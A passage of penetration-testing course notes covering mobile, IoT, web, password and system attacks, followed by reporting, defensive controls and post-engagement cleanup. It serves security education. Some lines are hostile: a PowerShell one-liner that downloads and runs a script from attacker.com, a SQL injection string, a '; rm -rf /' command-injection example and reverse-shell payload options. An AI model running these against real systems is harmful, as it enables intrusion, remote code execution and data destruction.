 Blends into the network to monitor device interactions.

5. Summary of Attack Techniques

 Deauth Attacks:
o Disrupt connections to capture reauthentication data.
 Jamming:
o Disables wireless access by flooding frequencies.
 Evil Twin:
o Creates a rogue AP to steal credentials.
 WPS PIN Brute Force:
o Exploits weak WPS implementations.

Module 11

1. Mobile Device Vulnerabilities

Deployment Methods
 BYOD (Bring Your Own Device):
 o Employees use personal devices for work.
o Risks: Lack of centralized control, increased attack surface.
 COBO (Corporate-Owned, Business Only):
o Strictly business devices, fully controlled by the organization.
 COPE (Corporate-Owned, Personally Enabled):
o Hybrid approach allowing personal use on corporate-owned devices.
 CYOD (Choose Your Own Device):
o Employees select a preapproved device owned by the organization.
Access Control Methods
 Factors:
o What You Know: Passwords, PINs.
o What You Have: Smart cards, USB tokens.
o What You Are: Biometrics (e.g., fingerprint, face ID).
o Where You Are: Location-based access.
o Context Awareness: Environmental factors (e.g., geolocation).

Enterprise Mobility Management (EMM)

 Functions:
o Mobile Device Management (MDM): Controls authentication, feature use,
and connectivity.
o Mobile Application Management (MAM): Prevents unauthorized app use,
pushes updates.
o Prevents root/jailbreaking, restricts data transfer to personal apps.

2. Threats to Mobile Devices

Common Mobile Vulnerabilities
 Android:
o Unpatched older OS versions.
o Custom ROMs and third-party apps.
 o Apps downloaded from unofficial sources.
 iOS:
o More secure but vulnerable to jailbreaking.
o Jailbreaking allows unsigned code execution and root access.
Threats to Business Logic:
 Lost or stolen devices.
 Lack of antimalware protection.
 Use of vulnerable components.

3. Mobile Device Attacks

Techniques
 Malware Types:
o Spyware, Trojans, Rootkits, Worms.
 Biometric Spoofing:
o Exploiting poorly implemented systems.
 Root Exploits:
o Attacks enabled by rooted/jailbroken devices.
 Permission Overreach:
o Apps requesting excessive privileges.
Social Engineering:
 SMiShing: Phishing via SMS.
 Vishing: Phishing via VoIP.
 Browser Hijacking: Redirects users to malicious sites.
 Drive-by Downloads: Malicious payloads downloaded without user knowledge.
Bluetooth Attacks:
 Bluejacking:
o Sends unwanted messages, images, or videos to Bluetooth devices.
 Bluesnarfing:
 o Reads sensitive data (e.g., contacts, emails) from a Bluetooth device.

Malware Analysis
 Reverse Engineering:
o Decompile and analyze malicious code.
 Sandbox Analysis:
o Safely execute malware to observe behavior.

4. Assessment Tools for Mobile Devices

Kali Linux Tools
 Ettercap:
o Conducts man-in-the-middle (on-path) attacks.
 Android SDK:
o Builds, tests, and reverse engineers Android apps.
 Burp Suite:
o Web application testing tool, supports iOS testing.
Mobile Security Framework (MobSF)
 Capabilities:
o Static Analysis:
 Evaluate code for Android and iOS apps.
o Dynamic Analysis:
 Assess running apps and detect jailbreaks/rooting.
Mobile Security Testing Guide (MSTG)
 Key Features:
o Security recommendations for Android/iOS.
o Resiliency testing for reverse engineering and tampering.
o Extensive checklists and external resources.
5. Tools for Code and API Testing
Frida and Objection
 Frida:
o Examines plaintext data, dumps process memory, and performs anti-
jailbreak/root detection.
 Objection:
o Debugger for unencrypted iOS apps, runs Frida scripts for file system
interactions.
Drozer
 Purpose:
o Identifies Android security flaws.
o Simulates app interactions as a user.
 Additional Tools:
o APKX: Decompiles APK files to analyze Java source code.
o APK Studio: An integrated development environment for editing APK files.
Postman
 API Testing:
o Creates and tests APIs.
o Analyzes results, runs reports, integrates with DevOps pipelines.

6. Summary of Threats and Tools

Common Threats:
 Rooting, jailbreaking, malware infections, and data exfiltration.
 Social engineering attacks tailored for mobile platforms.
Essential Tools:
 MobSF: Mobile app analysis.
 Frida/Objection: Debugging and code examination.
 Postman: API testing and integration.
Module 12

1. IoT Attacks
Understanding IoT Vulnerabilities
 IoT devices often lack sufficient security, making them vulnerable to:
o Standard Attacks:
 Buffer overflows, SQL injection, SYN floods, privilege escalation.
o Component Weaknesses:
 Preloaded malware or backdoors.
 Hardcoded configurations that are difficult to modify.
 Poor vendor patching processes.
Common Vulnerabilities:
1. Unencrypted Communications:
o Many IoT devices transmit data in plaintext.
o Intercepted data can be read or modified.
2. Physical Security Risks:
o Small, exposed devices (e.g., IP cameras) are easily damaged or stolen.
3. Data Leakage:
o Bluetooth Low Energy (BLE) can expose device models, smart home
activities, and user data.
IoT-Specific Attacks:
1. Denial of Sleep:
o Continuously sends signals to prevent rest cycles, draining the device
battery.
2. CoAP and MQTT Exploits:
o CoAP: Vulnerable to spoofing and coercive parsing.
o MQTT: Vulnerable to sniffing and botnet infections.
2. Data Storage Systems
Types of Storage Systems:
1. DAS (Direct-Attached Storage):
o Local storage (e.g., hard drives).
2. NAS (Network-Attached Storage):
o File servers connected to the network.
3. SAN (Storage Area Network):
o High-performance storage on a dedicated subnetwork.
Common Vulnerabilities:
1. Default Configurations:
o Weak or default usernames/passwords.
2. Management Interface Issues:
o Improper configurations expose the network and enable direct access to
data.

3. Industrial Control Systems (ICS)

ICS Characteristics:
 Used to manage industrial and critical infrastructure assets over networks.
 Often outdated and lack modern security standards.
SCADA and IIoT:
1. SCADA (Supervisory Control and Data Acquisition):
o Manages large-scale, geographically distributed devices.
2. IIoT (Industrial Internet of Things):
o Complements SCADA by integrating IoT capabilities for better data
collection.

4. Vulnerability Causes
1. Error Messages:
 o Detailed error messages can leak:
 User credentials, software versions, and configuration paths.
o Example:
 A verbose error with full pathname can lead to Directory Traversal
attacks.
2. Fuzzing:
o Sends random inputs to systems to discover vulnerabilities.
o Examples of findings:
 Admin login pages.
 Misconfigured file paths.

5. Virtual Machine (VM) Vulnerabilities

Virtualization Components:
1. Host Hardware:
o Physical hardware running virtual environments.
2. Hypervisor (Virtual Machine Monitor):
o Type I (Bare Metal): Installed directly on hardware (e.g., VMware ESXi).
o Type II (Host-Based): Runs on an OS (e.g., VirtualBox).
3. Guest Operating Systems:
o Virtual machines installed on the host.
VM Security Risks:
1. VM Sprawl:
o Uncontrolled creation of VMs without proper management.
2. Bad Repositories:
o Compromised VM templates that include vulnerabilities.

Common VM Attacks:
1. VM Escape:
 o Malware in a VM interacts directly with the hypervisor or host.
o Prevention:
 Apply patches to hypervisors.
 Use effective service design and network segmentation.
2. Hyperjacking:
o A malicious actor takes control of the hypervisor.
o Impact:
 Full access to all VMs and their data.

6. Container Security
 Containers:
o Agile environments for application provisioning.
o Vulnerabilities stem from:
 Misconfigured images containing unnecessary software.
 Lateral movement due to unrestricted access.

7. Attack Classes in Virtual Environments

1. Class 1:
o Attack happens outside of the VM.
2. Class 2:
o Attack targets the VM directly.
3. Class 3:
o Attack originates from within the VM.

8. Key Takeaways
IoT:
 Test devices for vulnerabilities before deployment.
 Enforce encryption and access control measures.
Virtualization:
 Monitor and secure hypervisors and repositories.
 Implement strict policies to prevent VM sprawl.
Industrial Systems:
 Regularly update and segment SCADA/ICS networks.
 Audit configurations to eliminate vulnerabilities.

Module 13

1. OWASP Top 10 Vulnerabilities

Common Vulnerabilities
1. Injection Attacks (A1):
o Includes SQL, OS, NoSQL, and LDAP injection.
o Example: Using malicious input like ' OR '1'='1 to manipulate queries.
2. Sensitive Data Exposure (A3):
o Results from insecure configurations or verbose error messages.
o Example: Misconfigured HTTP headers leaking sensitive information.
3. Security Misconfigurations (A6):
o Default configurations or open cloud storage exposing systems.
o Example: Debugging enabled in production environments.

2. Web Application Exploits

Session Attacks
 Session Hijacking:
o Stealing session tokens (e.g., cookies) to impersonate a user.
 Session Fixation:
o Forcing a victim to use a known session ID for later exploitation.
  Session Replay:
o Reusing captured credentials to access a session.
Cross-Site Request Forgery (CSRF/XSRF)
 Exploits trust in the user’s browser to perform unauthorized actions on behalf of
the user.
 Example: Submitting a malicious form while authenticated.
Privilege Escalation
1. Horizontal:
o Accessing another user's data or permissions.
2. Vertical:
o Gaining higher-level privileges (e.g., admin access).

3. Injection Attacks
SQL Injection (SQLi)
 Simple Test: Using ' to identify vulnerable points.
 Blind SQLi: Exploiting SQL vulnerabilities without visible outputs.
 Stacked Queries: Sending multiple queries in a single request.
Directory Traversal
 Exploits improper validation of file paths.
 Example: Using ../../ to access restricted directories.
Command Injection
 Executes system commands via unsanitized user input.
 Example: Supplying input like ; rm -rf / to a shell command.
Cross-Site Scripting (XSS)
1. Persistent:
o Code stored on the server and executed for all users.
2. Reflected:
o Injected code immediately returned to the victim.
 3. DOM-Based:
o Exploits client-side JavaScript to manipulate the DOM.

4. Tools for Web Application Testing

Web Testing Tools
1. WPScan:
o Scans WordPress sites for known vulnerabilities.
2. CrackMapExec:
o Identifies Active Directory vulnerabilities and misconfigurations.
Browser Exploit Framework (BeEF)
 Purpose:
o Targets browser vulnerabilities for XSS and injection attacks.
 Functionality:
o Hooks browsers to gain information or perform attacks.
 Interface:
o Lists hooked browsers as online/offline.
o Provides commands for further exploitation (e.g., use as a proxy, extract
internal IPs).

5. Exploiting Web Applications

Business Logic Flaws
 Result from faulty design leading to unintended application behaviors.
 Examples:
o No account lockout after multiple failed login attempts.
o Exploitable API endpoints in RESTful or SOAP APIs.
Non-Interactive Shells
 Limited functionality requiring upgrades to interactive shells.
 Commands may not auto-complete, and directories cannot be navigated
efficiently.
6. Adjusting for Defenses
Web Proxies
 Proxies intercept and filter web traffic, providing a barrier to PenTesters.
 PenTest Adaptations:
o Adjust traffic to bypass proxy filters.
o Test for proxy misconfigurations.

Key Takeaways
Web Testing Focus:
 Regularly test for OWASP vulnerabilities.
 Use tools like WPScan and BeEF to identify weaknesses.
Injection and Logic Flaws:
 Validate all user inputs.
 Test for flaws in API implementations and session handling.

Module 14

1. Understanding System Hacking

.NET and .NET Framework
 Key Points:
o Cross-platform and open-source framework for app development.
o Vulnerabilities exist in both the legacy .NET Framework and the
newer .NET Core.
o Used in many enterprise environments, making it a target for exploitation.

PowerShell for PenTesting

  Purpose:
o Automates tasks like registry manipulation, Active Directory enumeration,
and group policy management.
 Examples:
o Extract credentials using scripts.
o Inject payloads into processes.

C2 (Command and Control) Frameworks

1. Empire Framework:
o Uses PowerShell agents for post-exploitation tasks.
o Supports Windows and Linux environments.
2. Covenant:
o Highlights .NET-based attack surfaces.
o Cross-platform compatibility.
3. Mythic:
o Advanced C2 framework with multiple payload types.
o Highly customizable for MacOS targets.

2. Using Remote Access Tools

Netcat (nc)
 Purpose:
o Simple TCP/UDP utility for creating or connecting to network connections.
 Key Features:
o Port scanning, file transfer, and proxying.
o Syntax: nc [options] [target IP] [port].
Ncat
 Enhancements Over Netcat:
o Supports SSL encryption for secure communication.
 o Conceals data transfer to avoid detection.
o Integrates seamlessly with Nmap.
Secure Shell (SSH)
 Capabilities:
o Secure remote management and tunneling.
o Command-line access for managing systems.
o Used for pivoting in network PenTests.

3. Exploit Code and Enumeration

Downloading Exploit Code
 PowerShell Command Example:
o powershell.exe -c "IEX((New-Object
System.Net.WebClient).DownloadString('http://attacker.com/run.ps1'))"
o Explanation:
 Downloads a remote script and executes it.
 Useful for payload deployment in a PenTest.
Scripting for Remote Access
 msfvenom Payload Example:
o Options:
 -p reverse_powershell: Sets up a reverse shell.
 -nop: Bypasses PowerShell profiles.

Enumerating Users and Assets

 Purpose:
o Identify usernames for credential-based attacks.
o Discover assets for further exploitation or pivoting.
 Tools:
o Meterpreter (part of Metasploit): Used for advanced enumeration and
lateral movement.
Exploiting Web Applications
 WordPress Exploits:
o Vulnerable WordPress installations often expose user data.
o Scripts can append code to URLs to enumerate users.

4. Reverse Engineering and Debugging

Reverse Engineering Techniques
1. Decompilation:
o Translates executable code into source code for analysis.
o Useful for recovering lost code or identifying vulnerabilities.
2. Disassembly:
o Converts machine code into assembly language.
o Requires expertise in low-level programming.
3. Debugging:
o Analyzes a program’s runtime state.
o Identifies bugs or potential vulnerabilities.
Software Development Kits (SDKs)
 Purpose:
o Provide tools for app development and debugging.
 Popular Debugging Tools:
o Immunity Debugger: Analyzes Windows executables.
o Ghidra: Reverse engineering platform.
o WinDbg: Debugger for Windows programs.

5. Key Takeaways
 PowerShell is a powerful tool for automating tasks and exploiting Windows
environments.
  C2 Frameworks like Empire and Covenant are essential for advanced
PenTesting.
 Reverse Engineering helps identify vulnerabilities in proprietary or custom
applications.
 Netcat and Ncat remain staples for network exploration and remote access.

Module 15

1. Introduction to Scripting
Definition:
 A script automates repetitive tasks, enhancing efficiency and accuracy.
 Benefits:
o Customizable for specific penetration testing needs.
o Reduces manual errors in tasks like network scans, file parsing, and data
collection.

2. Scripting Languages
Bash (Linux Shell Scripting):
 Used for automating tasks such as file and directory management, parsing logs,
and extending the functionality of security tools like Nmap and tcpdump.
PowerShell (Windows Scripting):
 Automates Windows-specific tasks like registry modifications, Active Directory
enumeration, and group policy analysis using cmdlets with a Verb-Noun syntax.
Python:
 Highly readable and widely used for PenTesting tasks like fuzzing, reverse
engineering, and web exploitation.
 Supports an extensive library ecosystem, including tools like Scapy and Recon-
ng.
Ruby:
 Primarily used for extending the Metasploit Framework, a key tool in a
PenTester’s arsenal.
Perl:
 Known for powerful text processing, Perl is used in system administration and
penetration testing for log analysis and data extraction.
JavaScript:
 Enables dynamic interaction on web pages and is commonly used for web
application testing and exploitation.

3. Essential Scripting Concepts

Variables:
 Store data that can be referenced throughout the script.
 Variable syntax varies across languages but serves the purpose of holding
values for reuse.
Logic and Flow Control:
 Determines the script’s execution path based on conditions.
o If Statements: Executes a block of code when a condition is true.
o Loops: Repeats tasks for a defined number of times or until a condition is
met.
Boolean Operators:
 AND: True if both conditions are true.
 OR: True if at least one condition is true.
 NOT: Inverts the truth value of a condition.
Data Structures:
 Lists: Ordered collections of items.
 Sets: Unordered collections of unique elements.
 Dictionaries: Key-value pairs for structured data.
 Tuples: Immutable, ordered collections.
JSON (JavaScript Object Notation):
  A standard data format for transmitting structured data, used extensively in web
applications.

4. Automating PenTesting Tasks

Port Scanning Automation:
 Automates the scanning of multiple targets provided in a structured format (e.g.,
a spreadsheet).
 The process typically involves importing data, performing scans, and exporting
results to a report.
Automation Benefits:
 Reduces time spent on repetitive tasks.
 Improves accuracy and consistency in results.
Lab Practices:
 Labs focus on configuring tools like Nmap, automating scans, and generating
reports using scripting.

5. Object-Oriented Programming (OOP)

 Core Concepts:
o Functions: Modular and reusable code blocks.
o Classes: Templates for creating objects with attributes and behaviors.
o Modules: Collections of reusable functions and classes for streamlined
development.

6. Key Takeaways
 Scripting Tools:
o Python and Bash are versatile for most PenTesting tasks.
o PowerShell excels in automating Windows-specific workflows.
 Practical Applications:
o Scripting enhances efficiency in PenTesting by automating tasks like
enumeration, scanning, and data parsing.
Module 16

1. Offline Password Attacks

Definition:
 Occurs when attackers obtain a copy of usernames and passwords, often in a
hashed format (e.g., /etc/shadow in Linux, SAM database in Windows), and
perform password cracking on their own systems.
Types of Offline Attacks:
1. Dictionary Attack:
o Uses a predefined list of common passwords.
o Limited by password complexity and lockout policies.
2. Brute Force Attack:
o Tests all possible combinations of characters.
o Resource-intensive and time-consuming.
3. Password Spraying:
o Applies common passwords across multiple accounts to avoid triggering
lockout policies.

2. Attacking Passwords on Linux and Windows

Linux:
 Passwords stored as hashes in /etc/shadow.
 Crack using tools that identify the hash algorithm and apply cracking techniques.
Windows:
 Local credentials stored in SAM.
 Uses:
o LanMan (LM) and NT Hash algorithms.
 o Credentials may reside in memory and can be extracted using tools like
Mimikatz.

3. Password Cracking Tools

Common Tools:
 Hashcat:
o Supports dictionary, hybrid, and mask attacks.
o Optimized for GPU acceleration.
 Medusa:
o Parallel brute-forcing tool for network authentication services.
 Brutespray:
o Combines Nmap scan results with Medusa for automated brute force
attacks.

4. Lateral Movement
Definition:
 Involves moving from one system to another within a network after compromising
the initial host.
Techniques:
1. Remote Access Tools:
o Use RDP, SSH, WinRM, and PsExec for executing commands on remote
systems.
2. Enumerating Hosts:
o Map the network to identify potential targets.
3. Exploring Protocols:
o Leverage RPC, DCOM, and SMB to move laterally.

5. Pivoting
Definition:
  Gaining access to systems or networks that were inaccessible from the initial
attack vector by exploiting a compromised host.
Techniques:
 Port Forwarding:
o Redirects traffic to internal systems through the compromised host.
 VPN and SSH Tunnels:
o Establish encrypted connections to pivot into different segments.
 Routing Table Modifications:
o Alter network routes to enable access to new systems.

6. Privilege Escalation
Types:
1. Vertical Escalation:
o Gain higher privileges, such as admin or root access.
2. Horizontal Escalation:
o Access other user accounts with similar privileges.
Windows Techniques:
 Exploit services, drivers, or misconfigurations.
 Leverage unpatched vulnerabilities or kernel-specific exploits.
Linux Techniques:
 Exploit root-owned services or poorly configured cron jobs.
 Leverage software vulnerabilities in SUID binaries.

7. Persistence Techniques
Definition:
 Ensuring continued access to a compromised system even after detection
attempts.
Methods:
1. Backdoors:
 o Hidden mechanisms for unauthorized access.
o Example: Remote Access Trojans (RATs).
2. Scheduled Tasks:
o Windows: Use Task Scheduler to automate commands or scripts.
o Linux: Configure cron jobs for similar functionality.
3. Registry Modifications:
o Modify startup keys to execute malicious programs at boot.

8. Shell Types
Reverse Shell:
 The target system initiates a connection back to the attacker's machine, which is
listening on a specific port.
Bind Shell:
 The target system opens a listening port that the attacker connects to.
Daemons:
 Background processes (services on Windows, daemons on Unix) enable remote
access, even after reboots.

9. Advanced Persistent Threats (APT)

Characteristics:
 Long-term attacks targeting high-value organizations.
 Relies on sophisticated, stealthy techniques for data exfiltration over extended
periods.

10. Key Takeaways

 Offline attacks require obtaining password files or hashes for cracking.
 Lateral movement expands access to more systems within a network.
 Privilege escalation focuses on gaining higher or alternative access.
 Persistence ensures continued access and control even after detection attempts.
Module 17

1. Defining the Communication Path

Importance of Communication
 Essential for the success of a PenTest.
 Prevents risky or damaging decisions by having predefined escalation paths.
 Facilitates clarity during unexpected incidents.
Key Communication Elements
 Escalation Path:
o When and how the client will notify the PenTest team about system issues
caused by the test.
o When and how the PenTest team will involve the client IT team for
accidents or system destabilization.
 Stakeholder Awareness:
o IT managers and security officers (CIO/CISO) should be aware of the
PenTest.
o Restrict knowledge of the PenTest to avoid alerting staff when testing for
social engineering defenses.
Designated Points of Contact
 Primary Contact:
o Handles major decisions, often the CISO or project manager.
 Technical Contact:
o Manages technology-related elements of the PenTest and assesses
system impact.
 Emergency Contact:
o Available during business hours or 24/7 for urgent issues.

2. Communication Triggers
Reasons to Initiate Communication
 Status Reports:
o Regular progress updates to the client.
 Emergencies:
o Immediate communication for incidents or unplanned disruptions.
 Critical Findings:
o High-risk vulnerabilities identified during testing.
Prioritizing Findings
 PenTesting is a dynamic process requiring flexible prioritization.
 Findings during reconnaissance may redirect the PenTest focus.
 Adjustments may be required for significant new vulnerabilities or client-
requested changes.
Providing Situational Awareness
 Communicating detected PenTest attempts to appropriate contacts minimizes
conflict and enables the test to continue effectively.
Criminal Activity
 PenTesters must notify law enforcement if evidence of criminal conduct is
discovered.
 Consult legal counsel to handle such findings responsibly.
False Positives
 Common causes:
o Outdated vulnerability definitions.
o Misinterpreted customizations in the target environment.
o Incorrectly scored vulnerabilities.
 Mitigation:
o Use result validation techniques.
o Conduct additional reconnaissance to avoid false positives.

3. Reporting and Presenting Findings

Best Practices for Reporting
 Use Standards:
o Penetration Testing Execution Standard (PTES) provides clear guidelines
for presenting results.
o Classify vulnerabilities (technical or logical) for clarity.
 Frameworks:
o Dradis:
 Centralized framework for sharing PenTest details.
 Ensures team consistency and avoids redundant work.
o Nessus Reporting Module:
 Prebuilt templates standardize reports for consistency across
clients.
Key Report Components
 Summary of results.
 Classified vulnerabilities (e.g., critical, high, medium, low).
 Details of exploits, remediation suggestions, and risk analysis.

4. Key Takeaways
 Communication during PenTesting ensures efficiency and avoids potential
conflicts.
 Define escalation paths and roles clearly.
 Use standardized tools like Dradis and Nessus for consistent and detailed
reporting.

Module 18

1. Identifying the Report Audience

Importance of Audience Identification
  Tailor the PenTest report to the specific stakeholders to ensure the information is
actionable and understandable.
 Stakeholders may include:
o C-Suite Executives (e.g., CEO, CTO):
 Require high-level summaries for decision-making.
o Third-Party Stakeholders:
 Regulators, investors, or service providers who may indirectly be
involved.
o Technical Staff:
 Includes IT personnel responsible for maintaining systems.
o Developers:
 Focus on creating and implementing technical solutions.

2. Report Components
Executive Summary
 A concise, non-technical overview of:
o The testing process.
o Key findings and their potential impact.
o Ends with a conclusion statement summarizing whether the PenTest
objectives were met.
Scope Details
 Description of the engagement’s boundaries:
o What was tested.
o Deviations from the original scope or unexpected challenges.
Methodology
 High-level explanation of:
o Standards or frameworks followed (e.g., NIST, PTES).
o General activities performed and tools used.
Attack Narrative
  A detailed account of:
o The steps taken during the PenTest.
o How vulnerabilities were exploited.
o Correlation with the defined methodology.
Findings
 Organized presentation of:
o Vulnerabilities, threat levels, and risk ratings.
o Exploitable versus non-exploitable weaknesses.
o Reproducible steps for validation.
Business Impact Analysis (BIA)
 Assesses the potential impact of findings:
o Identifies processes, assets, or data critical to business continuity.
o Helps prioritize remediation efforts based on operational risks.
Metrics and Measures
 Quantifiable results displayed in tables or graphs.
 Examples:
o Number of high-severity vulnerabilities.
o Comparison of vulnerabilities across previous tests.
Remediation Recommendations
 Provides solutions for each identified issue.
 Examples:
o Weak password policies: Implement stronger password requirements.
o No multi-factor authentication (MFA): Suggest MFA implementation.
Conclusion and Appendix
 Conclusion:
o Summary of successes, failures, and overall objectives met.
o Key takeaways and a brief statement about next steps.
 Appendix:
 o Contains supporting evidence like:
 Screenshots, logs, detailed test results.

3. Risk Management
Risk Appetite
 Refers to the organization’s tolerance for vulnerabilities or threats.
 Helps determine priority for addressing issues based on:
o Potential financial loss.
o Operational disruption.
Risk Rating
 Quantifies vulnerabilities using frameworks like:
o CVSS (Common Vulnerability Scoring System).
o NIST Cybersecurity Framework (CSF).
Risk Prioritization
 Adjusts risk ratings to align with client-specific needs, focusing on:
o Data sensitivity (e.g., PII, PHI).
o Network exposure.
o Accessibility concerns.

4. Best Practices for Reporting

Storage and Distribution
 Reports should be:
o Stored securely to prevent unauthorized access.
o Distributed to appropriate personnel only, using repositories with
controlled access levels.
Ongoing Documentation
 Document findings as they occur during testing.
 Maintain detailed notes and evidence for:
 o Validating findings.
o Enhancing the report’s credibility.
Identifying Themes and Root Causes
 Recognize common issues:
o Use of outdated cryptographic protocols.
o Poor employee adherence to cybersecurity best practices.
 Offer industry-relevant best practices.
Observations
 Include additional details about:
o Deviations from scope.
o Critical actions taken during testing.
o Areas for improvement in future engagements.

Module 19

1. Employing Technical Controls

System Hardening
 Techniques to secure devices and applications:
o Install patches and updates promptly.
o Use firewalls and anti-malware solutions.
o Disable unused ports and services.
o Remove unnecessary software.
o Segment hosts on the network for improved isolation.
Input Sanitization
 Protects applications from code injection attacks (e.g., SQL injection, XSS) by:
o Escaping text to prevent unintended execution.
 o Null byte sanitization to remove malicious payloads.
o Using parameterized queries for safe SQL processing.
Multi-Factor Authentication (MFA)
 Combines two or more methods for authentication:
o Something You Know: Passwords.
o Something You Have: Security tokens, smart cards.
o Something You Are: Biometric verification.
Password Encryption
 Store passwords securely to prevent reuse:
o Avoid unsalted hashes, which are vulnerable to rainbow table attacks.
o Use encrypted databases or password managers for storing credentials.
Patch Management
 Process of identifying, testing, and deploying OS and application updates:
o Document applied patches.
o Note unpatched systems and alternative mitigations.
Key Rotation
 Periodically replace access keys for systems or repositories:
o Set expiry periods for keys.
o Use minimum length and complexity for security.
Certificate Management
 Administer and secure digital certificates:
o Revoke and replace compromised certificates.
o Implement certificate pinning to mitigate man-in-the-middle attacks.
Secret Management Solutions
 Securely store sensitive information like passwords and key pairs using:
o Dedicated platforms with support for dynamic and static credentials.
Network Segmentation
 Logical separation of infrastructure via subnets, VLANs, or firewalls:
 o Determine services that should be internal or internet-facing.
o Use air-gapped networks for critical systems.

2. Employing Administrative and Operational Controls

Policies and Procedures
 Establish guidelines to reduce cybersecurity risks:
o Define technical controls.
o Review and update policies as needed.
o Incorporate key performance indicators (KPIs) for evaluation.
Role-Based Access Control (RBAC)
 Assign access permissions based on job functions:
o Apply ACLs (Access Control Lists) to logical (e.g., servers, databases) and
physical resources (e.g., building access).
Password Policies
 Implement strategies to minimize credential-based attacks:
o Avoid plaintext storage; hash passwords.
o Use strong cryptographic hash functions like bcrypt.
o Enforce minimum complexity and expiration policies.
Secure Development Lifecycle (SDLC)
 Integrate security at every stage of development:
o Follow best practices during design, coding, and testing phases.
o Avoid insecure practices like hard-coded credentials and verbose error
handling.
Mobile Device Management (MDM)
 Centrally manage security policies for mobile devices:
o Perform regular vulnerability scans.
o Conduct penetration tests annually or biannually.
People as a Security Factor
 Mitigation strategies:
 o Regular security training for employees.
o Reinforce secure practices and penalties for non-compliance.
Operational Considerations
 Job Rotation: Prevent insider threats by periodically shifting roles.
 Time-of-Day Restrictions: Limit access outside working hours.
 Mandatory Vacations: Detect fraudulent activity during absences.

3. Employing Physical Controls

Building Access Control
 Manage access to facilities based on individual permissions:
o Use RFID cards for controlled entry.
o Supplement with physical barriers like turnstiles and locked doors.
Biometric Controls
 Rely on unique biological characteristics for secure access:
o Examples include fingerprint scanners and iris recognition.
Video Surveillance
 Monitor activity for security:
o Prefer wired connections over Wi-Fi to reduce attack vectors.
o Patch firmware to prevent vulnerabilities in camera systems.

4. Key Recommendations for Clients

 Implement policies that align with industry standards and best practices.
 Regularly audit and test systems for vulnerabilities.
 Integrate security into both technical and operational workflows.
 Train employees to recognize and mitigate social engineering threats.

Module 20
1. Post-Engagement Cleanup
Purpose
 Ensures that no artifacts from the PenTest remain on the system, which attackers
could potentially exploit.
 Focuses on restoring systems to their original state before testing.
Key Tasks
1. Deleting New Files:
o Remove any files created during testing from affected systems.
2. Restoring Log Files:
o Replace or revert any deleted or modified logs.
3. Restoring Applications:
o Reinstall clean backup copies of any compromised applications.

Removing Shells
 Definition:
o Shells installed during testing enable persistent unauthorized access.
 Windows Systems:
o Remove entries in registry keys like HKLM and HKCU that initiate shells
during boot.
 Linux Systems:
o Delete scripts in /etc/init.d/ and /etc/systemd/ that launch shells at startup.
 Scheduled Tasks:
o Remove entries in Windows Task Scheduler and Linux crontab that invoke
shells.

Deleting Tester-Created Credentials

 Challenges:
 o Local credentials can often be easily removed, but domain or tightly
integrated credentials may require direct database manipulation.
o Some systems might not allow account deletion without causing integrity
issues.

Eliminating Tools
 Tools like Metasploit payloads, keyloggers, and vulnerability scanner agents may
linger unless explicitly removed.
 Tools loaded in memory might be cleared after a system reboot, but persistent
ones require manual removal.
 Securely destroy associated files to prevent recovery.

Destroying Test Data

 Use secure data deletion techniques (e.g., shredding or overwriting) to eliminate
sensitive test data.
 Automate cleanup tasks using scripts to ensure consistency and avoid missed
steps.

2. Follow-Up Actions
Gaining Client Acceptance
 Purpose:
o Confirm that the client accepts the report and findings.
 Steps:
o Discuss the findings, address clarifications, and note any concerns
regarding the testing process.
Confirming Findings
 Attestation:
o PenTester signs off on the report, verifying the authenticity of findings.
o Evidence (e.g., screenshots, exfiltrated data) must be presented to
substantiate claims.
Planning a Retest
 Objective:
o Assess whether the client has successfully mitigated identified
vulnerabilities.
 Steps:
o Schedule retesting after the client implements remediation steps.
o Focus on previously discovered vulnerabilities and any new findings.
o Provide feedback on progress.

Reviewing Lessons Learned

 Goal:
o Improve future PenTest processes by analyzing what worked well and
what didn’t.
 Key Questions:
o What vulnerabilities and exploits were identified?
o What aspects of the test were successful?
o What could have been done better?
 Outcome:
o Draft a Lessons Learned Report (LLR) or After-Action Report (AAR) for
continuous improvement.

3. Key Takeaways
 Cleanup Tasks:
o Systematic removal of shells, tools, and credentials ensures no traces are
left behind.
 Client Communication:
o Regular discussions and attestation build trust and ensure alignment on
findings.
 Retesting:
o Validates remediation efforts and identifies any remaining vulnerabilities.
 Process Improvement:
o Lessons learned help refine PenTesting methodologies for future
engagements.